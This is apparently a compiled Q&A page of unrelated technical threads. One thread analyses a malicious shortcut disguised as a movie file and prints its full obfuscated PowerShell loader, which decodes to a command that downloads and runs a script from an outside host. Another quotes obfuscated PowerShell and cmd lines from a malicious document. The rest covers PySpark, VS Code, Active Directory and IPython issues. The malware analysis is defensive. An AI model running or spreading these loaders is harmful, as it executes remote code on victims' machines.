I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?
My guess, it runs a Powershell with
NoProfile
WindowStyle 1 = Minimized
ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
then dot-sources the remaining code
Let's split this code up:
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
$ShellId is a built-in Powershell variable:
>$ShellId
Microsoft.PowerShell
So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression)
The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I gues the char array contains ascii characters. If so, we can transform it to:
$aspx =
Summary:
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
So it invokes the code starting with $aspx = in a minimized Powershell window without warnings or prompts.
Maybe the code ran through one of these obfuscation methods.
Hope that helps.
I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut:
PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target
FullName : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments : -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description : .avi
Hotkey :
IconLocation : C:\WINDOWS\System32\imageres.dll,18
RelativePath :
TargetPath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
The target here translates to:
$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
I opened http://zvb.us/1 and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...
Related
I am trying to make Scala Xgboost API available for my PySpark Notebook. And following this blog:
https://towardsdatascience.com/pyspark-and-xgboost-integration-tested-on-the-kaggle-titanic-dataset-4e75a568bdb
However, keep on running into below err:
spark._jvm.ml.dmlc.xgboost4j.scala.spark.XGBoostEstimator
<py4j.java_gateway.JavaPackage at 0x7fa650fe7a58>
from sparkxgb import XGBoostEstimator
xgboost = XGBoostEstimator(
featuresCol="features",
labelCol="Survival",
predictionCol="prediction"
)
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-18-1765fb9e3344> in <module>
4 featuresCol="features",
5 labelCol="Survival",
----> 6 predictionCol="prediction"
7 )
~/spark-assembly-2.4.0-twttr-kryo3-scala2128-hadoop2.9.2.t05/python/pyspark/__init__.py in wrapper(self, *args, **kwargs)
108 raise TypeError("Method %s forces keyword arguments." % func.__name__)
109 self._input_kwargs = kwargs
--> 110 return func(self, **kwargs)
111 return wrapper
112
~/local/spark-3536cd7a-6188-4ca8-b3d0-57d42cd01531/userFiles-0a0d90bc-96b4-43f2-bf21-00ae0e6f7309/sparkxgb.zip/sparkxgb/xgboost.py in __init__(self, checkpoint_path, checkpointInterval, missing, nthread, nworkers, silent, use_external_memory, baseMarginCol, featuresCol, labelCol, predictionCol, weightCol, base_score, booster, eval_metric, num_class, num_round, objective, seed, alpha, colsample_bytree, colsample_bylevel, eta, gamma, grow_policy, max_bin, max_delta_step, max_depth, min_child_weight, reg_lambda, scale_pos_weight, sketch_eps, subsample, tree_method, normalize_type, rate_drop, sample_type, skip_drop, lambda_bias)
113
114 super(XGBoostEstimator, self).__init__()
--> 115 self._java_obj = self._new_java_obj("ml.dmlc.xgboost4j.scala.spark.XGBoostEstimator", self.uid)
116 self._create_params_from_java()
117 self._setDefault(
~/spark-assembly-2.4.0-twttr-kryo3-scala2128-hadoop2.9.2.t05/python/pyspark/ml/wrapper.py in _new_java_obj(java_class, *args)
65 java_obj = getattr(java_obj, name)
66 java_args = [_py2java(sc, arg) for arg in args]
---> 67 return java_obj(*java_args)
68
69 #staticmethod
TypeError: 'JavaPackage' object is not callable
I already google this error and tried below things. I got all ideas from this blog https://github.com/JohnSnowLabs/spark-nlp/issues/232 :
Make sure Xgboost4j is in the SPARK_DIST_CLASSPATH. Already checked.
$echo $SPARK_DIST_CLASSPATH | tr " " "\n" | grep 'xgboost4j' | rev | cut -d'/' -f1 | rev
xgboost4j-0.72.jar
xgboost4j-spark.72.jar
Make sure they are added to EXTRA_CLASSPATH. - Done
Updating configs.
'export PYSPARK_SUBMIT_ARGS="--conf spark.jars=$SPARK_HOME/jars/* --conf spark.driver.extraClassPath=$SPARK_HOME/jars/* --conf spark.executor.extraClassPath=$SPARK_HOME/jars/* pyspark-shell"',
Hardware Info:
Machine: Linux
Using Jupyter Notebook.
Spark Version 2.4.0
python3.6
I found the problem, The problem was that the sparkxbg.zip(which I downloaded over internet) is written for xgboost4j-0.72. However, my jars were from xgoost4j-0.9. And the API has been completetly changed. As a result 0.9 version didn't had any class named ml.dmlc.xgboost4j.scala.spark.XGBoostEstimator. And hence the error. You can see the difference in API below:
https://github.com/dmlc/xgboost/tree/release_0.72/jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark
vs
https://github.com/dmlc/xgboost/tree/v0.90/jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark
In the recent VS Code release, they added this feature to view the active variables in the Jupyter Notebook and also, view the values in the variable with Data Viewer.
However, every time I am trying to view the values in Data Viewer, VS Code is throwing error below. It says that the reason is that the object of data type is Int64 and not string, but I am sure that should not be the reason to not show the variable. Anyone facing similar issues. I tried with a simple data frame and it's working fine.
Error: Failure during variable extraction:
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-16-eae5f1f55b35> in <module>
97
98 # Transform this back into a string
---> 99 print(_VSCODE_json.dumps(_VSCODE_targetVariable))
100 del _VSCODE_targetVariable
101
~/anaconda3/lib/python3.7/json/__init__.py in dumps(obj, skipkeys, ensure_ascii, check_circular, allow_nan, cls, indent, separators, default, sort_keys, **kw)
229 cls is None and indent is None and separators is None and
230 default is None and not sort_keys and not kw):
--> 231 return _default_encoder.encode(obj)
232 if cls is None:
233 cls = JSONEncoder
~/anaconda3/lib/python3.7/json/encoder.py in encode(self, o)
197 # exceptions aren't as detailed. The list call should be roughly
198 # equivalent to the PySequence_Fast that ''.join() would do.
--> 199 chunks = self.iterencode(o, _one_shot=True)
200 if not isinstance(chunks, (list, tuple)):
201 chunks = list(chunks)
~/anaconda3/lib/python3.7/json/encoder.py in iterencode(self, o, _one_shot)
255 self.key_separator, self.item_separator, self.sort_keys,
256 self.skipkeys, _one_shot)
--> 257 return _iterencode(o, 0)
258
259 def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
~/anaconda3/lib/python3.7/json/encoder.py in default(self, o)
177
178 """
--> 179 raise TypeError(f'Object of type {o.__class__.__name__} '
180 f'is not JSON serializable')
181
TypeError: Object of type int64 is not JSON serializable
While analyzing a doc file, I see some power shell commands such as
Execute Command - params "PowersHeLL & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62 , 116 ,78 ,116 , 86, 77 ,95 ,58, 39 ,58 , 116 ,127 , 109
or
Run - params [Function FqLHmmC ([vwPoLiLXwz]): 7 statement(s), 'cmd /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , \' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C \' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^#^Y)PUA^ ; ; h0XobFu/^C " , , ( (s^ET ^ ^` ^ =E=6^l2u^\\^h^s\'^y4D^w^XoWJNzL#^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC)
How these are interpreted? For example, I guess 62 , 116, 109 ,84 are decimal values. However, converting them to ascii are not meaningful. The second one, e.g fiNd^^str , H^^C \' ; ; ) ; ^do sounds like a bash script. But it is not meaningful.
Does that mean, they are obfuscated? or obfuscation is something else?!
How these are interpreted?
Well, these are parsed and interpreted like any other PowerShell code. It's just harder to read for humans. [char]116 is just that. You can type it into PowerShell and find out what it is (ascii code for t).
Does that mean, they are obfuscated?
Yes.
Easiest way to deobfuscate is running the ScriptBlock logging enabled. The eventlog will unveil what actually is being executed. Since you don't know what you are going to execut: Only do this in an isolated sandbox environment!
I cannot add the GUID value for msExchArchiveGUID in powershell. Error reports of "constraint violation" or "A value for the attribute was not in the acceptable range of values" depending on which powershell cmdlet is used. From what I can tell the value that needs to be input needs to be up to 16 characters. Anything more and it errors. For example, the GUID value I need to write is 5C669E441173CF4394995E43EC8ED9ED. When pasted using ADSIEdit the output looks like: 5C 66 9E 44 11 73 CF 43 94 99 5E 43 EC 8E D9 ED. If I add the same value using Powershell it errors. How can I write the value in Powershell to give the same result like adding using ADSIEdit?
E.g
Set-aduser -identity "someone" -add #{msExchArchiveGUID="A format the works!
"}
The solution is a bit convoluted (and probably obvious to all but me!) which I will show below.. I'm sure a more concise answer is out there..
I get the GUID value using quest (rather that get-remotemailbox)
Get-QADUser -Service domain -Identity someone -IncludeAllProperties|select msExchArchiveGUID
This presents the archive GUID as 5C669E441173CF4394995E43EC8ED9ED
So.....
$oct = "5C669E441173CF4394995E43EC8ED9ED"
$oct1 = $oct.substring(0,2)
$oct2 = $oct.substring(2,2)
$oct3 = $oct.substring(4,2)
$oct4 = $oct.substring(6,2)
$oct5 = $oct.substring(8,2)
$oct6 = $oct.substring(10,2)
$oct7 = $oct.substring(12,2)
$oct8 = $oct.substring(14,2)
$oct9 = $oct.substring(16,4)
$oct10 = $oct.substring(20,12)
$strOut = "$oct4" + "$oct3" + "$oct2" + "$oct1" + "-" + "$oct6" + "$oct5" + "-" + "$oct8" + "$oct7" + "-" + "$oct9" + "-" + "$oct10"
Output is "449E665C-7311-43CF-9499-5E43EC8ED9ED"
$Id = [GUID]("449e665c-7311-43cf-9499-5e43ec8ed9ed")
Set-ADUser -Identity $IPGUser -Clear msexcharchiveGUID
Set-ADUser User -Add #{msexchArchiveGUId=$id}
I'm using IPython as a system shell.
Is there a way to make IPython to raise an exception when the shell command fails? (non-zero exit codes)
The default makes them fail silently.
As of IPython 4.0.1, !cmd is transformed into get_ipython().system(repr(cmd)) (IPython.core.inputtransformer._tr_system()).
In the source, it's actually InteractiveShell.system_raw(), as inspect.getsourcefile() and inspect.getsource() can tell.
It delegates to os.system() in Windows and subprocess.call() in other OSes. Not configurable, as you can see from the code.
So, you need to replace it with something that would call subprocess.check_call().
Apart from monkey-patching by hand, this can be done with the IPython configuration system. Available options (viewable with the %config magic) don't allow to replace TerminalInteractiveShell with another class but several TerminalIPythonApp options allow to execute code on startup.
Do double-check whether you really need this though: a look through the system_raw()'s source reveals that it sets the _exit_code variable - so it doesn't actually fail completely silently.
If you use ! to execute shell commands, errors will pass silently
!echo "hello" && exit 1
hello
If you use the %%sh cell magic to execute the shell command, errors will raise:
%%sh
echo "hello" && exit 1
hello
---------------------------------------------------------------------------
CalledProcessError Traceback (most recent call last)
<ipython-input-10-9229f76cae28> in <module>
----> 1 get_ipython().run_cell_magic('sh', '', 'echo "hello" && exit 1\n')
~/anaconda/envs/altair-dev/lib/python3.6/site-packages/IPython/core/interactiveshell.py in run_cell_magic(self, magic_name, line, cell)
2360 with self.builtin_trap:
2361 args = (magic_arg_s, cell)
-> 2362 result = fn(*args, **kwargs)
2363 return result
2364
~/anaconda/envs/altair-dev/lib/python3.6/site-packages/IPython/core/magics/script.py in named_script_magic(line, cell)
140 else:
141 line = script
--> 142 return self.shebang(line, cell)
143
144 # write a basic docstring:
<decorator-gen-110> in shebang(self, line, cell)
~/anaconda/envs/altair-dev/lib/python3.6/site-packages/IPython/core/magic.py in <lambda>(f, *a, **k)
185 # but it's overkill for just that one bit of state.
186 def magic_deco(arg):
--> 187 call = lambda f, *a, **k: f(*a, **k)
188
189 if callable(arg):
~/anaconda/envs/altair-dev/lib/python3.6/site-packages/IPython/core/magics/script.py in shebang(self, line, cell)
243 sys.stderr.flush()
244 if args.raise_error and p.returncode!=0:
--> 245 raise CalledProcessError(p.returncode, cell, output=out, stderr=err)
246
247 def _run_script(self, p, cell, to_close):
CalledProcessError: Command 'b'echo "hello" && exit 1\n'' returned non-zero exit status 1.